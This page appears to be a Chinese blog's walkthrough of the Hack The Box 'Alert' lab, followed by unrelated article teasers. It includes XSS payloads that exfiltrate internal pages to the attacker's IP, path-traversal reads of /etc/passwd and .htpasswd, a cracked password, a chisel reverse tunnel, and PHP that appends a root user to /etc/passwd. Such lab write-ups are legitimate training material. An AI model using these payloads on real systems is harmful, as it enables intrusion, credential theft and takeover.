当前位置：首页 > news >正文

HTB：Alert[WriteUP]

news 2025/9/10 7:27:51

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用ffuf对alert.htb域名进行子域名FUZZ

使用gobuster对alert.htb域名进行路径FUZZ

边界突破

使用curl访问/messages.php文件

使用浏览器直接访问alert.htb域名

再次构造一个XSS脚本，访问/messages.php文件并将响应结果传输回攻击机

本地侧netcat监听后成功收到回显

读取Apache的配置文件，其默认路径为：/etc/apache2/sites-available/000-default.conf

使用john通过字典爆破该密码哈希

使用ssh通过上述凭证登录靶机

权限提升

查看靶机内部网络连接

攻击机使用chisel开始监听反向连接

通过代理chisel的1080端口，访问该服务

进入该WebAPP目录下，查看文件权限分配情况

直接通过php代码使其执行系统命令追加一个root用户

在攻击机中使用浏览器或curl访问该文件

连接至HTB服务器并启动靶机

分配IP：10.10.16.22

靶机IP：10.10.11.44

靶机Domain：alert.htb

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a alert.htb -r 1-65535 --ulimit 5000 | tee res

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p22,80 -sCV -Pn alert.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

nmap -sT -p22,80 --script=vuln -O -Pn alert.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn alert.htb

使用ffuf对alert.htb域名进行子域名FUZZ

ffuf -u http://alert.htb -H 'Host: FUZZ.alert.htb' -w ../dictionary/subdomains-top20000.txt -t 50 -fw 20

使用gobuster对alert.htb域名进行路径FUZZ

gobuster dir -u http://alert.htb -w ../dictionary/Common-dir.txt -x php,txt -t 50

边界突破

使用curl访问/messages.php文件

curl -v http://alert.htb/messages.php

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://alert.htb/messages.php
* Host alert.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.44
* Trying 10.10.11.44:80...
* Connected to alert.htb (10.10.11.44) port 80
* using HTTP/1.x
> GET /messages.php HTTP/1.1
> Host: alert.htb
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Sun, 02 Feb 2025 13:47:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 1
< Content-Type: text/html; charset=UTF-8
<

* Connection #0 to host alert.htb left intact

由回显可见，虽然响应码为200但并未返回任何实质内容，应该存在访问白名单

使用浏览器直接访问alert.htb域名

可见，该页允许上传一个.md文件，因此我尝试XSS反弹

<script>
alert(1)
</script>

上传至靶机后，由弹窗可知该JS代码被成功解析

再次构造一个XSS脚本，访问/messages.php文件并将响应结果传输回攻击机

<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.22:1425/?file_content=" + encodeURIComponent(data));});
</script>

上传至靶机后，点击右下角的Share Markdown获得该文件URL

回到主界面，找到上方的Contact Us

将URL发送至靶机支持团队

本地侧netcat监听后成功收到回显

nc -lvnp 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 42838
GET /?file_content=%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

使用python将内容解码

python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A'))"

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A'))"
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

此处我注意到地址：messages.php?file=2024-03-10_15-48-34.txt，由此可见messages.php允许接收一个file参数，因此我尝试通过它进行本地文件读取

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.22:1425/?file_content=" + encodeURIComponent(data));});
</script>

如法炮制上面的步骤，成功收到响应

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 52334
GET /?file_content=%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

使用python对其解码

python -c "import urllib.parse; print(urllib.parse.unquote_plus('%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A'))"

<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>

读取Apache的配置文件，其默认路径为：/etc/apache2/sites-available/000-default.conf

获得响应

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 41872
GET /?file_content=%3Cpre%3E%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Falert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Falert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20RewriteEngine%20On%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5Ealert%5C.htb%24%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5E%24%0A%20%20%20%20RewriteRule%20%5E%2F%3F(.*)%24%20http%3A%2F%2Falert.htb%2F%241%20%5BR%3D301%2CL%5D%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20statistics.alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Fstatistics.alert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20Indexes%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%20%20%20%20AuthType%20Basic%0A%20%20%20%20%20%20%20%20AuthName%20%22Restricted%20Area%22%0A%20%20%20%20%20%20%20%20AuthUserFile%20%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd%0A%20%20%20%20%20%20%20%20Require%20valid-user%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

使用CyberChef进行解码，可见.htpasswd文件路径：/var/www/statistics.alert.htb/.htpasswd

读取.htpasswd文件

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 34862
GET /?file_content=%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A HTTP/1.1
Host: 10.10.16.22:1425
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

再次使用CyberChef解码，获得一份凭证

账户：albert

密码哈希：$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

将该密码哈希存入文件中

echo '$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' > hash

使用john通过字典爆破该密码哈希

john hash --wordlist=../dictionary/rockyou.txt --format=md5crypt-long

获得完整凭证

账户：albert

密码：manchesterunited

使用ssh通过上述凭证登录靶机

ssh albert@alert.htb

在/home/albert目录下找到user.txt文件

albert@alert:~$ ls
user.txt
albert@alert:~$ pwd
/home/albert
albert@alert:~$ cat user.txt
c7756c23c61c6bfe638b9ef0f5dd21a2

权限提升

查看靶机内部网络连接

ss -tlnp

可见，8080端口仅允许本地访问，使用chisel将其映射至攻击机

攻击机使用chisel开始监听反向连接

chisel server -p 8888 --reverse

控制靶机连接至攻击机chisel服务器

./chisel64 client 10.10.16.22:8888 R:socks

攻击机chisel服务端收到连接回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# chisel server -p 8888 --reverse
2025/02/02 14:08:39 server: Reverse tunnelling enabled
2025/02/02 14:08:39 server: Fingerprint 25IPnk94XCx+F+CwNdUr/eR2Fh8awqZSx87sFGotha4=
2025/02/02 14:08:39 server: Listening on http://0.0.0.0:8888
2025/02/02 14:09:22 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2025/02/02 14:09:22 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

通过代理chisel的1080端口，访问该服务

可见该WebAPP为：Website Monitor

查看靶机进程也可应验

ps -aux | grep 8080

由输出可知，该进程由root用户启动

albert@alert:/tmp$ ps -aux | grep 8080
root 1001 0.0 0.6 207256 26552 ? Ss 09:59 0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
albert 5254 0.0 0.0 6432 724 pts/0 S+ 14:56 0:00 grep --color=auto 8080

进入该WebAPP目录下，查看文件权限分配情况

cd /opt/website-monitor

由输出可见，monitors目录允许其他用户写入

直接通过php代码使其执行系统命令追加一个root用户

cd monitors

在/etc/passwd文件中追加root用户

echo '<?php exec("echo x0da6h::0:0:x0da6h:/root:/bin/bash >> /etc/passwd"); ?>' > x0da6h.php

在攻击机中使用浏览器或curl访问该文件

回到靶机中查看/etc/passwd文件可见该用户被成功追加

直接切换到该用户

su x0da6h

albert@alert:~$ su x0da6h
root@alert:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@alert:/home/albert# whoami
root

在/root目录下找到root.txt文件

root@alert:~# pwd
/root
root@alert:~# ls
root.txt scripts
root@alert:~# cat root.txt
f8e13577a1c0404ce343be234410e3d1

HTB：Alert[WriteUP]

目录连接至HTB服务器并启动靶机信息收集使用rustscan对靶机TCP端口进行开放扫描使用nmap对靶机TCP开放端口进行脚本、服务扫描使用nmap对靶机TCP开放端口进行漏洞、系统扫描使用nmap对靶机常用UDP端口进行开放扫描使用ffuf对alert.htb域名进行子域名FUZZ 使用go…...

编程日记 2025/2/3 10:05:57

ARM嵌入式学习--第十天（UART）

--UART介绍 UART(Universal Asynchonous Receiver and Transmitter)通用异步接收器，是一种通用串行数据总线，用于异步通信。该总线双向通信，可以实现全双工传输和接收。在嵌入式设计中，UART用来与PC进行通信，包括与监控…...

编程日记 2025/2/3 10:04:55

玉米苗和杂草识别分割数据集labelme格式1997张3类别

数据集格式：labelme格式(不包含mask文件，仅仅包含jpg图片和对应的json文件) 图片数量(jpg文件个数)：1997 标注数量(json文件个数)：1997 标注类别数：3 标注类别名称:["corn","weed","Bean…...

编程日记 2025/2/3 10:00:51

哈夫曼树

哈夫曼树（Huffman Tree）是一种最优的二叉树，常用于数据压缩，如在 Huffman 编码中使用。它是根据字符出现的频率来构造的，频率越高的字符越靠近树的根，频率低的字符则在较深的节点上。其核心思想是通过构建一…...

编程日记 2025/2/3 9:58:43

wax到底是什么意思

在很久很久以前，人类还没有诞生文字之前，人类就产生了语言；在诞生文字之前，人类就已经使用了语言很久很久。没有文字之前，人们的语言其实是相对比较简单的，因为人类的生产和生活水平非常低下，…...

编程日记 2025/2/3 9:56:36

笔记：使用ST-LINK烧录STM32程序怎么样最方便？

一般板子在插件上， 8脚 3.3V;9脚 CLK;10脚 DIO;4脚GND ST_Link 19脚 3.3V;9脚 CLK;7脚 DIO;20脚 GND 烧录软件：ST-LINK Utility，Keil_5; ST_Link 接口针脚定义： 按定义连接ST_Link与电路板； 打开STM32 ST-LINK Uti…...

编程日记 2025/2/3 9:52:30

数据分析系列--[11] RapidMiner,K-Means聚类分析(含数据集)

一、数据集二、导入数据三、K-Means聚类数据说明:提供一组数据,含体重、胆固醇、性别。分析目标:找到这组数据中需要治疗的群体供后续使用。一、数据集点击下载数据集二、导入数据三、K-Means聚类 Ending, congratulations, youre done....

编程日记 2025/2/3 9:50:27

Python在数据科学领域的深度应用：从数据处理到机器学习模型构建

Python在数据科学领域的深度应用：从数据处理到机器学习模型构建在当今大数据与人工智能蓬勃发展的时代，Python凭借其简洁的语法、强大的库支持和活跃的社区，已成为数据科学家和工程师的首选编程语言。本文将深入探讨Python在数据科学领域的应用，从数据预处理、探索性分析…...

编程日记 2025/2/3 9:47:22

海外问卷调查渠道查，具体运营的秘密

相信只要持之以恒并逐渐掌握技巧，每一位调查人在踏上征徐之时都会非常顺利的。并在日后的职业生涯中拥有捉刀厮杀的基本技能！本文会告诉你如何做好一个优秀的海外问卷调查人。在市场经济高速发展的今天，众多的企业为了自身的生存和发展而在…...

编程日记 2025/2/3 9:42:16

穷举vs暴搜vs深搜vs回溯vs剪枝系列一＞单词搜索

题解如下题目：解析决策树：代码设计： 代码： 题目： 解析决策树： 代码设计： 代码： class Solution {private boolean[][] visit;//标记使用过的数据int m,n;//行，列char…...

编程日记 2025/2/3 9:38:12

万字长文深入浅出负载均衡器

前言本篇博客主要分享Load Balancing（负载均衡），将从以下方面循序渐进地全面展开阐述： 介绍什么是负载均衡介绍常见的负载均衡算法负载均衡简介初识负载均衡负载均衡是系统设计中的一个关键组成部分，它有助于…...

编程日记 2025/2/3 9:34:02

基于SpringBoot的青年公寓服务平台的设计与实现(源码+SQL脚本+LW+部署讲解等)

专注于大学生项目实战开发,讲解,毕业答疑辅导，欢迎高校老师/同行前辈交流合作✌。技术范围：SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。主要内容：…...

编程日记 2025/2/3 9:29:55

经典游戏红色警戒2之英语

1. New construction options 部署新的建筑物（一般是部署基地车时说的）。 2. Loading 等待。（正在进行） 3. Construction complete 建筑完成。 4. On hold 等待。（暂停进行） 5. Canceled 取消。 6. Ca…...

编程日记 2025/2/3 9:27:47

IM 即时通讯系统-50-[特殊字符]cim(cross IM) 适用于开发者的分布式即时通讯系统

IM 开源系列 IM 即时通讯系统-41-开源野火IM 专注于即时通讯实时音视频技术，提供优质可控的IMRTC能力 IM 即时通讯系统-42-基于netty实现的IM服务端,提供客户端jar包,可集成自己的登录系统 IM 即时通讯系统-43-简单的仿QQ聊天安卓APP IM 即时通讯系统-44-仿QQ即…...

编程日记 2025/2/3 9:25:42

QtCreator在配置Compilers时,有一个叫ABI的选项,那么什么是ABI？

问题提出 QtCreator在配置Compilers时,有一个叫ABI的选项,那么什么是ABI？ ABI（Application Binary Interface）介绍 ABI（Application Binary Interface，应用二进制接口）是指应用程序与操作系统或其他程序…...

编程日记 2025/2/3 9:24:34

处理 5万字（约7.5万-10万token，中文1字≈1.5-2token）的上下文

处理 5万字（约7.5万-10万token，中文1字≈1.5-2token） 的上下文，对模型的长文本处理能力和显存要求较高。以下是不同规模模型的适用性分析及推荐： 一、模型规模与上下文能力的关系模型类型参数量最大上下文长度&#…...

编程日记 2025/2/3 9:16:20

【狂热算法篇】探秘图论之Dijkstra 算法：穿越图的迷宫的最短路径力量（通俗易懂版）

